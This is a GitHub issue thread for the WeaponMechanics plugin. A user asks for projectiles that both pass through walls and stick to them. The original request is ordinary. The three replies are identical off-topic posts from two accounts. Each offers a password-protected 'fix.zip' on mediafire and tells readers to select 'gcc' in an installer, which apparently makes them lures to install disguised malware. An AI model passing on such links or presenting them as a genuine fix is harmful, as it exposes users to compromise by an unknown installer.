### ISSUE TITLE
Through + Sticky

### ISSUE THREAD

**Issue by ciliomine** [WeaponMechanics/MechanicsMain#450]
### Description

I started testing this since users usually test weapons by shooting at walls or other targets to see their distance/etc.

And I realized that you cannot combine these two functions since if you put the "sticky" function on the projectile, will no longer go through the wall anymore.

On the other hand, my projectile is a long stick since I want to give it a shooter game style effect, and this looks ugly if it stays stuck on the wall, It would be great if you could put the item you want attached to the wall.

Thank you so much

### Payment (optional)

- [ ] I'm willing to pay for this feature

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
